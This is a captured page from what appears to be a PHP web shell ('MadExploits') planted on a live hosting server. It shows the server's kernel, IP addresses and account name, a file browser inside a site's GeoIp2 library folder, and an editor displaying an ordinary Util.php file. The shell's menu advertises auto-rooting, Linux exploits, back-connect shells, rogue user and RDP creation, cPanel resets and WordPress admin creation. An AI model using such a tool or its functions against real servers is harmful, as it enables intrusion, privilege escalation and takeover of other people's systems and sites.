Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.70.130.22
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
lib /
maxmind /
GeoIp2 /
[ HOME SHELL ]
Name
Size
Permission
Action
Database
[ DIR ]
drwxr-xr-x
Exception
[ DIR ]
drwxr-xr-x
Model
[ DIR ]
drwxr-xr-x
Record
[ DIR ]
drwxr-xr-x
WebService
[ DIR ]
drwxr-xr-x
ProviderInterface.php
474
B
-rw-r--r--
Util.php
913
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Util.php
<?php namespace GeoIp2; class Util { /** * This returns the network in CIDR notation for the given IP and prefix * length. This is for internal use only. * * @internal * @ignore * * @param mixed $ipAddress * @param mixed $prefixLen */ public static function cidr($ipAddress, $prefixLen) { $ipBytes = inet_pton($ipAddress); $networkBytes = str_repeat("\0", \strlen($ipBytes)); $curPrefix = $prefixLen; for ($i = 0; $i < \strlen($ipBytes) && $curPrefix > 0; $i++) { $b = $ipBytes[$i]; if ($curPrefix < 8) { $shiftN = 8 - $curPrefix; $b = \chr(0xFF & (\ord($b) >> $shiftN) << $shiftN); } $networkBytes[$i] = $b; $curPrefix -= 8; } $network = inet_ntop($networkBytes); return "$network/$prefixLen"; } }
Close